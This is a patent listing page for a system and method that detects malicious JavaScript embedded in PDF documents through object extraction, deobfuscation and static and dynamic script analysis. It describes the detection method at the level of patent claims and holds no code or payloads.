SYSTEM AND METHOD FOR DETECTING MALICIOUS CODE OF PDF DOCUMENT TYPE
First Claim
Patent Images
1. A PDF document type malicious code detection system, comprising:
- an object extraction module configured to find and extract a plurality of object information contained within a collected PDF document;
a script merge module configured to merge each first JavaScript information from the plurality of extracted object information to generate second JavaScript information;
an obfuscation release module configured to decrypt/decode the obfuscated/encoded second JavaScript information to generate third JavaScript information when the generated second JavaScript information is obfuscated/encoded;
a script static module configured to parse the generated third JavaScript information to extract function/pattern information suspected as a malicious code;
a script dynamic module to execute fourth JavaScript information containing the function and pattern information to generate behavior information according to a malicious behavior; and
a malicious code extraction module configured to extract malicious code information from the behavior information when it is confirmed that a malicious code has been generated.
2 Assignments
0 Petitions
Accused Products
Abstract
Disclosed herein is a PDF document type malicious code detection system for efficiently detecting a malicious code embedded in a document type and a method thereof. The present invention may perform a dynamic and static analysis on JavaScript within a PDF document, and execute the PDF document to perform a PDF dynamic analysis, thereby achieving an effect of efficiently extracting a malicious code embedded in the PDF document.
-
Citations
10 Claims
-
1. A PDF document type malicious code detection system, comprising:
-
an object extraction module configured to find and extract a plurality of object information contained within a collected PDF document; a script merge module configured to merge each first JavaScript information from the plurality of extracted object information to generate second JavaScript information; an obfuscation release module configured to decrypt/decode the obfuscated/encoded second JavaScript information to generate third JavaScript information when the generated second JavaScript information is obfuscated/encoded; a script static module configured to parse the generated third JavaScript information to extract function/pattern information suspected as a malicious code; a script dynamic module to execute fourth JavaScript information containing the function and pattern information to generate behavior information according to a malicious behavior; and a malicious code extraction module configured to extract malicious code information from the behavior information when it is confirmed that a malicious code has been generated. - View Dependent Claims (2, 3, 4)
-
-
5. The PDF document type malicious code detection system of claim wherein the script static module extracts function/pattern information containing at least one of a URL, a PE file (execution file), a JS.HTM file, a code command such as Run or Shell, and a code command such as Copy or Create.
-
6. A PDF document type malicious code detection method, the method comprising:
-
(a) parsing a plurality of object information contained within a collected PDF document; (b) determining whether there is first JavaScript information within the plurality of object information as a result of the analysis; (c) merging the first JavaScript information when it is determined that there is the first JavaScript information as a result of the determination; (d) determining whether second JavaScript information generated by the merging is obfuscated/encoded; (e) decrypting/decoding the second JavaScript information when it is obfuscated/encoded as a result of the determination; (f) parsing the decrypted/decoded and generated third JavaScript information to perform a script static analysis; (g) performing a script dynamic analysis on fourth JavaScript generated to contain function/pattern information suspected as a malicious code by the script static analysis; and (h) extracting malicious code information from behavior information acquired by the script dynamic analysis. - View Dependent Claims (7, 8, 9, 10)
-
Specification